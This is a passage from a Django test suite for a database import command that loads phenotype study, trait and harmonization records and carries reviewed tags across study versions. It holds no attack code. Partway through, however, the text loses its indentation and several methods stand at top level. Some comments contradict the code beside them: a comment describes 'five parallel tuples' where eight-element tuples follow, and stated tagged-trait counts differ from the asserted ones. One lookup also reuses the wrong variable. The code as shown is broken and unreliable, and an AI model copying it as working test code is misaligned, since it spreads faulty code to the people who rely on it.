        harmonized_trait_set.refresh_from_db()
        harmonized_trait_set_version.refresh_from_db()
        harmonization_unit.refresh_from_db()
        harmonized_trait.refresh_from_db()
        hev.refresh_from_db()
        component_source_trait.refresh_from_db()
        htrait_to_link_source.refresh_from_db()
        hunit_to_link_source.refresh_from_db()
        component_batch_trait.refresh_from_db()
        htrait_to_link_batch.refresh_from_db()
        hunit_to_link_batch.refresh_from_db()
        component_age_trait.refresh_from_db()
        hunit_to_link_age.refresh_from_db()
        component_harmonized_trait_set_version.refresh_from_db()
        htrait_to_link_harmonized.refresh_from_db()
        hunit_to_link_harmonized.refresh_from_db()
        reason_to_link.refresh_from_db()
        hts_version_to_link_reason.refresh_from_db()
        # Check that modified date > created date, values are updated, for each model.
        self.assertEqual(new_value, global_study.i_name)
        self.assertTrue(global_study.modified > t1)
        self.assertEqual(new_value, study.i_study_name)
        self.assertTrue(study.modified > t1)
        self.assertEqual(new_is_deprecated, source_study_version.i_is_deprecated)
        self.assertTrue(source_study_version.modified > t1)
        self.assertEqual(new_description, source_dataset.i_dbgap_description)
        self.assertTrue(source_dataset.modified > t1)
        self.assertEqual(new_value, subcohort.i_name)
        self.assertTrue(subcohort.modified > t1)
        self.assertEqual(new_value, source_trait.i_dbgap_comment)
        self.assertTrue(source_trait.modified > t1)
        self.assertEqual(new_value, sev.i_value)
        self.assertTrue(sev.modified > t1)
        self.assertEqual(new_value, harmonized_trait_set.i_trait_set_name)
        self.assertTrue(harmonized_trait_set.modified > t1)
        self.assertEqual(new_value, harmonized_trait_set_version.i_harmonized_by)
        self.assertTrue(harmonized_trait_set_version.modified > t1)
        self.assertEqual(new_value, harmonization_unit.i_tag)
        self.assertTrue(harmonization_unit.modified > t1)
        self.assertEqual(new_value, harmonized_trait.i_description)
        self.assertTrue(harmonized_trait.modified > t1)
        self.assertEqual(new_value, hev.i_value)
        self.assertTrue(hev.modified > t1)
        # Check that each new m2m link was imported, on both sides of the relation.
        self.assertTrue(htrait_to_link_source in component_source_trait.source_component_of_harmonized_trait.all())
        self.assertTrue(hunit_to_link_source in component_source_trait.source_component_of_harmonization_unit.all())
        self.assertTrue(htrait_to_link_batch in component_batch_trait.batch_component_of_harmonized_trait.all())
        self.assertTrue(hunit_to_link_batch in component_batch_trait.batch_component_of_harmonization_unit.all())
        self.assertTrue(hunit_to_link_age in component_age_trait.age_component_of_harmonization_unit.all())
        self.assertTrue(htrait_to_link_harmonized in component_harmonized_trait_set_version.harmonized_component_of_harmonized_trait.all()) # noqa: E501
        self.assertTrue(hunit_to_link_harmonized in component_harmonized_trait_set_version.harmonized_component_of_harmonization_unit.all()) # noqa: E501
        self.assertTrue(reason_to_link in hts_version_to_link_reason.update_reasons.all())
        self.assertTrue(hts_version_to_link_reason in reason_to_link.harmonizedtraitsetversion_set.all())
    def test_values_match_after_all_updates(self):
        """All imported field values match those in the source db after making updates to the source db.

        The setup (one change per table, one new link per m2m table) mirrors
        test_updated_data_from_every_table; the checks (field-by-field and m2m
        comparison against the source db) mirror test_imported_ids_match_source_ids.
        """
        # Initial import of the test data (with visit).
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Prepare for making changes in the devel database.
        # Close the db connections because change_data_in_table() opens new connections.
        self.cursor.close()
        self.source_db.close()
        # Copy/paste the upper part from test_updated_data_from_every_table and copy/paste the lower part from
        # test_imported_ids_match_source_ids
        # Make updates of every kind in the devel db.
        new_value = 'asdfghjkl' # Use this value to reset things in multiple models.
        # Update the global study table.
        global_study = models.GlobalStudy.objects.all()[0]
        # Sleep so the updated rows get strictly later timestamps.
        sleep(1)
        change_data_in_table(
            'global_study', 'name', new_value, global_study._meta.pk.name.replace('i_', ''), global_study.pk)
        # Update the study table.
        study = models.Study.objects.all()[0]
        change_data_in_table('study', 'study_name', new_value, study._meta.pk.name.replace('i_', ''), study.pk)
        # Update the source study version table.
        source_study_version = models.SourceStudyVersion.objects.all()[0]
        new_is_deprecated = int(not source_study_version.i_is_deprecated)
        change_data_in_table(
            'source_study_version', 'is_deprecated', new_is_deprecated,
            source_study_version._meta.pk.name.replace('i_', ''), source_study_version.pk)
        # Update source dataset table.
        source_dataset = models.SourceDataset.objects.all()[0]
        new_description = '23oriuam.sadflkj'
        change_data_in_table(
            'source_dataset', 'dbgap_description', new_description, source_dataset._meta.pk.name.replace('i_', ''),
            source_dataset.pk)
        # Update the subcohort table.
        subcohort = models.Subcohort.objects.get(pk=1)
        change_data_in_table('subcohort', 'name', new_value, subcohort._meta.pk.name.replace('i_', ''), subcohort.pk)
        # Update source trait table.
        source_trait = models.SourceTrait.objects.all()[0]
        change_data_in_table('source_trait', 'dbgap_comment', new_value, 'source_trait_id', source_trait.pk)
        # Update source trait encoded values table.
        sev = models.SourceTraitEncodedValue.objects.all()[0]
        change_data_in_table(
            'source_trait_encoded_values', 'value', new_value, sev._meta.pk.name.replace('i_', ''), sev.pk)
        # Update harmonized trait set table.
        harmonized_trait_set = models.HarmonizedTraitSet.objects.all()[0]
        change_data_in_table(
            'harmonized_trait_set', 'trait_set_name', new_value, harmonized_trait_set._meta.pk.name.replace('i_', ''),
            harmonized_trait_set.pk)
        # Update harmonized trait set version table.
        harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.all()[0]
        change_data_in_table(
            'harmonized_trait_set_version', 'harmonized_by',
            new_value, harmonized_trait_set_version._meta.pk.name.replace('i_', ''), harmonized_trait_set_version.pk
        )
        # Don't update allowed update reason table, because it should NOT change.
        # Update harmonization unit table.
        harmonization_unit = models.HarmonizationUnit.objects.all()[0]
        change_data_in_table(
            'harmonization_unit', 'tag', new_value, harmonization_unit._meta.pk.name.replace('i_', ''),
            harmonization_unit.pk
        )
        # Update harmonized trait table.
        harmonized_trait = models.HarmonizedTrait.objects.all()[0]
        change_data_in_table('harmonized_trait', 'description', new_value, 'harmonized_trait_id', harmonized_trait.pk)
        # Update harmonized trait encoded values table.
        hev = models.HarmonizedTraitEncodedValue.objects.all()[0]
        change_data_in_table(
            'harmonized_trait_encoded_values', 'value', new_value, hev._meta.pk.name.replace('i_', ''), hev.pk)
        # Prep for doing updates for m2m tables.
        self.source_db = get_devel_db(permissions='full')
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Add a component source trait to a unit not already linked to it.
        component_source_trait = models.SourceTrait.objects.order_by('?').first()
        hunit_to_link_source = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(component_source_traits__in=[component_source_trait]))[0]
        htrait_to_link_source = hunit_to_link_source.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
        add_component_trait_query = """INSERT INTO component_source_trait (harmonized_trait_id, harmonization_unit_id,
            component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
                htrait_to_link_source.i_trait_id, hunit_to_link_source.i_id, component_source_trait.i_trait_id,
                timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_component_trait_query)
        self.source_db.commit()
        # Add a component batch trait.
        component_batch_trait = models.SourceTrait.objects.order_by('?').first()
        hunit_to_link_batch = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(component_batch_traits__in=[component_batch_trait]))[0]
        htrait_to_link_batch = hunit_to_link_batch.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
        add_component_trait_query = """INSERT INTO component_batch_trait (harmonized_trait_id, harmonization_unit_id,
            component_trait_id, date_added) values ('{}', '{}', '{}', '{}')""".format(
                htrait_to_link_batch.i_trait_id, hunit_to_link_batch.i_id, component_batch_trait.i_trait_id,
                timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_component_trait_query)
        self.source_db.commit()
        # NOTE(review): LAST_INSERT_ID() result never fetched — leftover debug query.
        self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
        # Add a component age trait.
        component_age_trait = models.SourceTrait.objects.order_by('?').first()
        hunit_to_link_age = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(component_age_traits__in=[component_age_trait]))[0]
        add_component_trait_query = """INSERT INTO component_age_trait (harmonization_unit_id, component_trait_id,
            date_added) values ('{}', '{}', '{}')""".format(
                hunit_to_link_age.i_id, component_age_trait.i_trait_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_component_trait_query)
        self.source_db.commit()
        # NOTE(review): result unused here as well — leftover debug query.
        self.cursor.execute('SELECT LAST_INSERT_ID() AS last')
        # Add a component harmonized trait set version.
        component_harmonized_trait_set_version = models.HarmonizedTraitSetVersion.objects.order_by('?').first()
        hunit_to_link_harmonized = models.HarmonizationUnit.objects.exclude(
            i_id__in=models.HarmonizationUnit.objects.filter(
                component_harmonized_trait_set_versions__in=[component_harmonized_trait_set_version]))[0]
        htrait_to_link_harmonized = hunit_to_link_harmonized.harmonized_trait_set_version.harmonizedtrait_set.all()[0]
        add_component_trait_query = """INSERT INTO component_harmonized_trait_set (harmonized_trait_id,
            harmonization_unit_id, component_trait_set_version_id, date_added) values
            ('{}', '{}', '{}', '{}')""".format(
                htrait_to_link_harmonized.i_trait_id, hunit_to_link_harmonized.i_id,
                component_harmonized_trait_set_version.i_id,
                timezone.now().strftime('%Y-%m-%d %H:%M:%S')
        )
        # This insert is committed by the commit after the reason link below (same connection).
        self.cursor.execute(add_component_trait_query)
        # Add an update reason to a harmonized trait set version.
        reason_to_link = models.AllowedUpdateReason.objects.get(pk=1)
        linked_hts_versions = reason_to_link.harmonizedtraitsetversion_set.all()
        possible_hts_versions = models.HarmonizedTraitSetVersion.objects.all()
        unlinked_hts_versions = set(possible_hts_versions) - set(linked_hts_versions)
        hts_version_to_link_reason = list(unlinked_hts_versions)[0]
        add_reason_link_query = """INSERT INTO harmonized_trait_set_version_update_reason (reason_id,
            harmonized_trait_set_version_id, date_added)
            VALUES ({}, {}, '{}');""".format(
                reason_to_link.pk, hts_version_to_link_reason.i_id, timezone.now().strftime('%Y-%m-%d %H:%M:%S'))
        self.cursor.execute(add_reason_link_query)
        self.source_db.commit()
        # Close the full privileges db connection, and reopen as read-only.
        self.cursor.close()
        self.source_db.close()
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Get the updates.
        management.call_command('import_db', '--devel_db', '--no_backup', '--verbosity=0',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Check all of the regular models.
        # The next three tuples are parallel: element i of make_args_functions builds
        # model args from source rows of element i of tables for element i of model_names.
        make_args_functions = (
            CMD._make_global_study_args,
            CMD._make_study_args,
            CMD._make_source_study_version_args,
            CMD._make_subcohort_args,
            CMD._make_source_dataset_args,
            CMD._make_harmonized_trait_set_args,
            CMD._make_allowed_update_reason_args,
            CMD._make_harmonized_trait_set_version_args,
            CMD._make_harmonization_unit_args,
            CMD._make_source_trait_args,
            CMD._make_harmonized_trait_args,
            CMD._make_source_trait_encoded_value_args,
            CMD._make_harmonized_trait_encoded_value_args,
        )
        tables = (
            'global_study',
            'study',
            'source_study_version',
            'subcohort',
            'source_dataset',
            'harmonized_trait_set',
            'allowed_update_reason',
            'harmonized_trait_set_version',
            'harmonization_unit',
            'source_trait',
            'harmonized_trait',
            'source_trait_encoded_values',
            'harmonized_trait_encoded_values',
        )
        model_names = (
            models.GlobalStudy,
            models.Study,
            models.SourceStudyVersion,
            models.Subcohort,
            models.SourceDataset,
            models.HarmonizedTraitSet,
            models.AllowedUpdateReason,
            models.HarmonizedTraitSetVersion,
            models.HarmonizationUnit,
            models.SourceTrait,
            models.HarmonizedTrait,
            models.SourceTraitEncodedValue,
            models.HarmonizedTraitEncodedValue,
        )
        self.check_imported_values_match(make_args_functions, tables, model_names)
        # Check all of the M2M relationships (five parallel tuples, one element per link table).
        m2m_tables = (
            'component_source_trait',
            'component_harmonized_trait_set',
            'component_batch_trait',
            'component_age_trait',
            'component_source_trait',
            'component_harmonized_trait_set',
            'component_batch_trait',
            'harmonized_trait_set_version_update_reason',
        )
        group_by_fields = (
            'harmonized_trait_id',
            'harmonized_trait_id',
            'harmonized_trait_id',
            'harmonization_unit_id',
            'harmonization_unit_id',
            'harmonization_unit_id',
            'harmonization_unit_id',
            'harmonized_trait_set_version_id',
        )
        concat_fields = (
            'component_trait_id',
            'component_trait_set_version_id',
            'component_trait_id',
            'component_trait_id',
            'component_trait_id',
            'component_trait_set_version_id',
            'component_trait_id',
            'reason_id',
        )
        parent_models = (
            models.HarmonizedTrait,
            models.HarmonizedTrait,
            models.HarmonizedTrait,
            models.HarmonizationUnit,
            models.HarmonizationUnit,
            models.HarmonizationUnit,
            models.HarmonizationUnit,
            models.HarmonizedTraitSetVersion,
        )
        m2m_att_names = (
            'component_source_traits',
            'component_harmonized_trait_set_versions',
            'component_batch_traits',
            'component_age_traits',
            'component_source_traits',
            'component_harmonized_trait_set_versions',
            'component_batch_traits',
            'update_reasons',
        )
        self.check_imported_m2m_relations_match(
            m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
        # Load a new study and run all of these checks again.
        self.cursor.close()
        self.source_db.close()
        load_test_source_db_data('new_study.sql')
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(self.user.email))
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # Check all of the regular models again.
        self.check_imported_values_match(make_args_functions, tables, model_names)
        # Check all of the M2M relationships again.
        self.check_imported_m2m_relations_match(
            m2m_tables, group_by_fields, concat_fields, parent_models, m2m_att_names)
def test_updated_sourcetraits_are_tagged(self):
"""Taggedtraits from v1 of a study are applied to v2 during import."""
# Run import of base test data.
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
self.cursor.close()
self.source_db.close()
# Choose some source traits to remove from one version to test different situations.
study_phs = 956
ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
# I used this code to figure out which traits could be found in v1 and v2.
# Leave it here commented out in case this needs to be done again later.
# # Compare lists of phvs between the two study versions to figure out what to tag.
# v1_phvs = models.SourceTrait.objects.filter(
# source_dataset__source_study_version=ssv1
# ).values_list('i_dbgap_variable_accession', flat=True)
# v2_phvs = models.SourceTrait.objects.filter(
# source_dataset__source_study_version=ssv2
# ).values_list('i_dbgap_variable_accession', flat=True)
# v1_phvs = set(v1_phvs)
# v2_phvs = set(v2_phvs)
# in_both = v1_phvs & v2_phvs
# only_v1 = v1_phvs - v2_phvs
# only_v2 = v2_phvs - v1_phvs
# print(in_both)
# print(only_v1)
# print(only_v2)
# There are 51 variables in v1 of Amish, so don't go above 50 for the index.
amish_v1_traits = models.SourceTrait.objects.filter(
source_dataset__source_study_version__study__pk=study_phs,
source_dataset__source_study_version__i_version=1
).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
old_trait_v2_only = amish_v1_traits.all()[1]
old_trait_v1_only = amish_v1_traits.all()[2]
old_trait_both = amish_v1_traits.all()[3]
old_trait_to_not_tag = amish_v1_traits.all()[4]
# Remove a trait from v1.
old_trait_v2_only.delete()
# Create the tagged traits in v1.
# Both of these are status confirmed in dccreview step.
old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
DCCReview.objects.create(
tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
# Create taggedtraits with all valid status combinations to make sure that it doesn't prevent application
# of updated tags (tests the check for incomplete review status).
followup_agree_taggedtrait = TaggedTraitFactory.create(
trait=amish_v1_traits.all()[5], archived=True)
DCCReview.objects.create(
tagged_trait=followup_agree_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
StudyResponse.objects.create(
dcc_review=followup_agree_taggedtrait.dcc_review,
creator=self.user, comment='', status=StudyResponse.STATUS_AGREE
)
followup_disagree_confirm_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6])
DCCReview.objects.create(
tagged_trait=followup_disagree_confirm_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
StudyResponse.objects.create(
dcc_review=followup_disagree_confirm_taggedtrait.dcc_review,
creator=self.user, comment='', status=StudyResponse.STATUS_DISAGREE
)
DCCDecision.objects.create(
dcc_review=followup_disagree_confirm_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_CONFIRM
)
followup_disagree_remove_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6], archived=True)
DCCReview.objects.create(
tagged_trait=followup_disagree_remove_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
StudyResponse.objects.create(
dcc_review=followup_disagree_remove_taggedtrait.dcc_review,
creator=self.user, comment='', status=StudyResponse.STATUS_DISAGREE
)
DCCDecision.objects.create(
dcc_review=followup_disagree_remove_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_REMOVE
)
followup_noresponse_confirm_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6])
DCCReview.objects.create(
tagged_trait=followup_noresponse_confirm_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
DCCDecision.objects.create(
dcc_review=followup_noresponse_confirm_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_CONFIRM
)
followup_noresponse_remove_taggedtrait = TaggedTraitFactory.create(trait=amish_v1_traits.all()[6], archived=True)
DCCReview.objects.create(
tagged_trait=followup_noresponse_remove_taggedtrait,
creator=self.user, status=DCCReview.STATUS_FOLLOWUP, comment='')
DCCDecision.objects.create(
dcc_review=followup_noresponse_remove_taggedtrait.dcc_review,
creator=self.user, comment='', decision=DCCDecision.DECISION_REMOVE
)
# Load test data with updated study version.
load_test_source_db_data('new_study_version.sql')
# Remove a trait from the devel db via SQL query.
source_db = get_devel_db(permissions='full')
cursor = source_db.cursor(buffered=True)
new_trait_v1_only_conditions = (
'study_accession={}'.format(study_phs),
'study_version=2',
'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
)
new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
new_trait_v1_only_conditions
)
cursor.execute(new_trait_v1_only_query)
new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
cursor.execute(delete_query)
source_db.commit()
cursor.close()
source_db.close()
# Run import of updated study version
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
# Tags match for the taggedtrait in both v1 and v2.
new_trait_both = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_both.i_dbgap_variable_accession
)
self.assertQuerysetEqual(new_trait_both.non_archived_tags.all().values_list('lower_title', flat=True),
old_trait_both.non_archived_tags.all().values_list('lower_title', flat=True),
transform=lambda x: x)
# There isn't a v2 trait for the v1 only trait.
with self.assertRaises(ObjectDoesNotExist):
new_trait_v1_only = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_v1_only.i_dbgap_variable_accession
)
# There aren't any tags in v2 for the trait that didn't exist in v1.
new_trait_v2_only = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_v2_only.i_dbgap_variable_accession
)
self.assertEqual(new_trait_v2_only.all_taggedtraits.all().count(), 0)
# There isn't a tagged trait for the v1 trait that was not tagged.
new_trait_not_tagged = models.SourceTrait.objects.get(
source_dataset__source_study_version__study__pk=956,
source_dataset__source_study_version__i_version=2,
i_dbgap_variable_accession=old_trait_v2_only.i_dbgap_variable_accession
)
self.assertEqual(new_trait_not_tagged.all_taggedtraits.all().count(), 0)
# The count of tagged traits in v2 is 1. The count of tagged traits in v1 is 2.
ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
self.assertEqual(ssv1_taggedtraits.count(), 7)
ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
self.assertEqual(ssv2_taggedtraits.count(), 3)
# There are three status combinations that should prevent the application of tags during import:
# 1. dcc_review, dcc_review__study_response, and dcc_review__dcc_decision do not exist
# 2. dcc_review followup, study_response disagree, and dcc_decision does not exist
# 3. dcc_review followup, and study_response and dcc_decision do not exist
# The next three test methods will test that each of these three cases stop
# the tag application process during import.
def test_tags_not_applied_if_unreviewed_taggedtraits_exist(self):
    """Tags are not applied to updated traits if any taggedtraits with incomplete review process exist."""
    # Run import of base test data.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    self.cursor.close()
    self.source_db.close()
    # Choose some source traits to remove from one version to test different situations.
    study_phs = 956
    ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
    # Exclude administrative variables so the picked fixtures are regular traits.
    amish_v1_traits = models.SourceTrait.objects.filter(
        source_dataset__source_study_version__study__pk=study_phs,
        source_dataset__source_study_version__i_version=1
    ).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
    old_trait_v2_only = amish_v1_traits.first()
    old_trait_v1_only = amish_v1_traits.last()
    old_trait_both = amish_v1_traits.all()[2]
    old_trait_to_not_tag = amish_v1_traits.all()[3]  # NOTE(review): unused below; kept parallel with sibling tests.
    old_trait_to_leave_unreviewed = amish_v1_traits.all()[4]
    # Remove a trait from v1.
    old_trait_v2_only.delete()
    # Create the tagged traits in v1 (both fully reviewed as confirmed).
    old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
    DCCReview.objects.create(
        tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
    old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
    DCCReview.objects.create(
        tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
    # Create one unreviewed taggedtrait (no DCCReview at all) -- case 1 above.
    old_unreviewed_taggedtrait = TaggedTraitFactory.create(trait=old_trait_to_leave_unreviewed)
    old_taggedtraits_count = TaggedTrait.objects.count()
    # Load test data with updated study version.
    load_test_source_db_data('new_study_version.sql')
    # Remove a trait from the devel db via SQL query, so that trait exists in v1 only.
    source_db = get_devel_db(permissions='full')
    cursor = source_db.cursor(buffered=True)
    new_trait_v1_only_conditions = (
        'study_accession={}'.format(study_phs),
        'study_version=2',
        'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
    )
    new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
        new_trait_v1_only_conditions
    )
    cursor.execute(new_trait_v1_only_query)
    new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
    delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
    cursor.execute(delete_query)
    source_db.commit()
    cursor.close()
    source_db.close()
    # Run import of updated study version
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
    # There are no new taggedtraits: the unreviewed taggedtrait blocks tag application.
    later_taggedtraits_count = TaggedTrait.objects.count()
    self.assertEqual(old_taggedtraits_count, later_taggedtraits_count)
    ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
    self.assertEqual(ssv1_taggedtraits.count(), 3)
    ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
    self.assertEqual(ssv2_taggedtraits.count(), 0)
def test_tags_not_applied_if_disagreeundecided_taggedtraits_exist(self):
    """Tags are not applied to updated traits if dccdecision is missing after disagree studyresponse."""
    # Run import of base test data.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    self.cursor.close()
    self.source_db.close()
    # Choose some source traits to remove from one version to test different situations.
    study_phs = 956
    ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
    # Exclude administrative variables so the picked fixtures are regular traits.
    amish_v1_traits = models.SourceTrait.objects.filter(
        source_dataset__source_study_version__study__pk=study_phs,
        source_dataset__source_study_version__i_version=1
    ).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
    old_trait_v2_only = amish_v1_traits.first()
    old_trait_v1_only = amish_v1_traits.last()
    old_trait_both = amish_v1_traits.all()[2]
    old_trait_to_not_tag = amish_v1_traits.all()[3]  # NOTE(review): unused below; kept parallel with sibling tests.
    old_trait_to_leave_undecided = amish_v1_traits.all()[4]
    # Remove a trait from v1.
    old_trait_v2_only.delete()
    # Create the tagged traits in v1 (both fully reviewed as confirmed).
    old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
    DCCReview.objects.create(
        tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
    old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
    DCCReview.objects.create(
        tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
    # Create one undecided taggedtrait: followup review + disagree response, but
    # no dcc_decision -- case 2 in the comment block above.
    old_undecided_taggedtrait = TaggedTraitFactory.create(trait=old_trait_to_leave_undecided)
    DCCReview.objects.create(
        tagged_trait=old_undecided_taggedtrait, creator=self.user, status=DCCReview.STATUS_FOLLOWUP)
    StudyResponse.objects.create(
        dcc_review=old_undecided_taggedtrait.dcc_review, creator=self.user, status=StudyResponse.STATUS_DISAGREE)
    old_taggedtraits_count = TaggedTrait.objects.count()
    # Load test data with updated study version.
    load_test_source_db_data('new_study_version.sql')
    # Remove a trait from the devel db via SQL query, so that trait exists in v1 only.
    source_db = get_devel_db(permissions='full')
    cursor = source_db.cursor(buffered=True)
    new_trait_v1_only_conditions = (
        'study_accession={}'.format(study_phs),
        'study_version=2',
        'dbgap_trait_accession={}'.format(old_trait_v1_only.i_dbgap_variable_accession)
    )
    new_trait_v1_only_query = 'SELECT source_trait_id FROM view_source_trait_all WHERE ' + ' AND '.join(
        new_trait_v1_only_conditions
    )
    cursor.execute(new_trait_v1_only_query)
    new_trait_v1_only_source_trait_id = cursor.fetchall()[0][0]
    delete_query = 'DELETE FROM source_trait WHERE source_trait_id={}'.format(new_trait_v1_only_source_trait_id)
    cursor.execute(delete_query)
    source_db.commit()
    cursor.close()
    source_db.close()
    # Run import of updated study version
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    ssv2 = models.SourceStudyVersion.objects.get(study__pk=956, i_version=2)
    # There are no new taggedtraits: the undecided taggedtrait blocks tag application.
    later_taggedtraits_count = TaggedTrait.objects.count()
    self.assertEqual(old_taggedtraits_count, later_taggedtraits_count)
    ssv1_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv1).all()
    self.assertEqual(ssv1_taggedtraits.count(), 3)
    ssv2_taggedtraits = TaggedTrait.objects.filter(trait__source_dataset__source_study_version=ssv2).all()
    self.assertEqual(ssv2_taggedtraits.count(), 0)
def test_tags_not_applied_if_noresponseundecided_taggedtraits_exist(self):
    """Tags are not applied to updated traits if dccdecision and studyresponse are both missing."""
    # Run import of base test data.
    management.call_command('import_db', '--devel_db', '--no_backup',
                            '--taggedtrait_creator={}'.format(self.user.email))
    self.cursor.close()
    self.source_db.close()
    # Choose some source traits to remove from one version to test different situations.
    study_phs = 956
    ssv1 = models.SourceStudyVersion.objects.get(study__pk=study_phs, i_version=1)
    # Exclude administrative variables so the picked fixtures are regular traits.
    amish_v1_traits = models.SourceTrait.objects.filter(
        source_dataset__source_study_version__study__pk=study_phs,
        source_dataset__source_study_version__i_version=1
    ).exclude(i_trait_name__in=('CONSENT', 'SOURCE_SUBJECT_ID', 'SUBJECT_SOURCE'))
    old_trait_v2_only = amish_v1_traits.first()
    old_trait_v1_only = amish_v1_traits.last()
    old_trait_both = amish_v1_traits.all()[2]
    old_trait_to_not_tag = amish_v1_traits.all()[3]  # NOTE(review): unused below; kept parallel with sibling tests.
    old_trait_to_leave_undecided = amish_v1_traits.all()[4]
    # Remove a trait from v1.
    old_trait_v2_only.delete()
    # Create the tagged traits in v1 (both fully reviewed as confirmed).
    old_taggedtrait_both = TaggedTraitFactory.create(trait=old_trait_both)
    DCCReview.objects.create(
        tagged_trait=old_taggedtrait_both, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
    old_taggedtrait_v1_only = TaggedTraitFactory.create(trait=old_trait_v1_only)
    DCCReview.objects.create(
        tagged_trait=old_taggedtrait_v1_only, creator=self.user, status=DCCReview.STATUS_CONFIRMED)
    # Create one undecided taggedtrait: followup review with neither a study
    # response nor a dcc decision -- case 3 in the comment block above.
    old_undecided_taggedtrait = TaggedTraitFactory.create(trait=old_trait_to_leave_undecided)
    DCCReview.objects.create(
        tagged_trait=old_undecided_taggedtrait, creator=self.user, status=DCCReview.STATUS_FOLLOWUP)
    old_taggedtraits_count = TaggedTrait.objects.count()
